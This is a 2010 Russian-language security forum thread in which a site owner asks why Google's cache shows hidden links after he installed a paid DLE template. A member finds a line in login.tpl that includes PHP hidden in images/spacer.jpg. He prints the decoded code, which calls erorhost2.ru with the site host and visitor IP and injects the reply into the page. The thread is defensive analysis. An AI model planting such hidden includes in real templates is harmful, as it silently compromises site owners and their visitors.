ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.09.2010, 13:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
1320
Репутация:
0
|
|
Здравствуйте.
Установил новый шаблон ДЛЕ. Всё было нормально и вот спустя несколько дней перешёл в кэш (Сохранённую копию) Гугла и там увидел следующие ссылки:
Самое интересное, что я не вижу подобных ссылок. Смотрел код в разных браузерах, заходил через анонимные прокси - ничего нет!
Изучал файлы шаблона, вроде все коды в tpl - файлах стандартные для ДЛЕ, смотрел CSS, графические файлы... Не знаю на первый взгляд ничего скрытого в шаблоне нет.
В общем Гугл видит ссылки, а я нет.
Если кто знает, посоветуйте пожалуйста, что можно сделать в данной ситуации.
Шаблон пока поменял на старый. |
|
|
|
24.09.2010, 13:28
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Не нашел в выдаче. И не нашел в шабе твоем ничего.
|
|
|
24.09.2010, 14:39
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от DCrypt
DCrypt said:
Не нашел в выдаче. И не нашел в шабе твоем ничего.
Интересно, как ты узнал какой сайт его? Их тысячи
http://siteexplorer.search.yahoo.com/search?p=http://sn27.net/&fr=sfp&bwm=i
freeman22, для начала заюзай "Антивирус" в админке DLE.
|
|
|
|
24.09.2010, 14:51
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Интересно, как ты узнал какой сайт его? Их тысячи
Мне чел дал шаблон+линк на его сайт.
|
|
|
|
24.09.2010, 14:54
|
|
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223
Репутация:
408
|
|
Просмотри .js фаилы. Вполне возможно, что проиклудили его в шаблон, либо изменили существующий.
с примерно таким содержанием(*.js):
Сообщение от None
document.write('тут всё что угодно');
+ может быть криптован\зашифрован |
|
|
|
24.09.2010, 15:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
1320
Репутация:
0
|
|
Вот кэш этого шаблона, посмотрите там где логин есть цифра 1 и перед ней эти ссылки.
Сообщение от None
http://webcache.googleusercontent.com/search?q=cache:b51CKfYyfTsJ:/page/4/+&cd=4&hl=ru&ct=clnk&gl=ru
И посмотрите сейчас какой шаблон, там этих ссылок нет! |
|
|
|
24.09.2010, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
1320
Репутация:
0
|
|
Кстати он не бесплатный покупал здесь http://plati.ru/asp/pay.asp?id_d=927804&searchstr=youporn.ru&agent=0
Если кто сможет разобраться, где зашили эти ссылки буду благодарен.
Но деле именно в шаблоне!!! Сейчас на сайте стоит другой шаблон и Гугл не показывает никаких ссылок скрытых!
|
|
|
|
24.09.2010, 16:09
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Странно..я прочесал весь шаблон с начала и до конца. Никаких шифров вроде небыло.
|
|
|
|
24.09.2010, 16:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
в login.tpl
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$void[/COLOR][COLOR="#007700"]= include ([/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/images/spacer.jpg'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
инклюдит файл ./images/spacer.jpg
там
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Декодированный
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$x0b[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"erorhost2.ru"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0d[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);
if(![/COLOR][COLOR="#0000BB"]$x0b[/COLOR][COLOR="#007700"]){
return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}else{
[/COLOR][COLOR="#0000BB"]$x0e[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://erorhost2.ru/id2.php?site=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]HTTP_HOST[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]&ip=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]REMOTE_ADDR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0e[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=erorhost2 |
|
|
|
24.09.2010, 17:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
1320
Репутация:
0
|
|
попугай, большое спасибо!
Убрал в tpl строчку с инклудом и удалил spacer.jpg. Вернул шаблон, надеюсь ссылок этих больше в кэше Гугла не увижу.
P.S.Вот такую "заразу" можно и за деньги купить. Жалко, что на plati.ru претензии (с целью возврата средств) принимаются только в течении 3 дней с момента покупки товара.
Рано обрадовался.
Если просто зайти на сайт, не под админ-аккаунтом, то видна пустая страница, если вернуть $void = include ($tpl->dir.'/images/spacer.jpg'); , но при этом удалить spacer.jpg , то
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
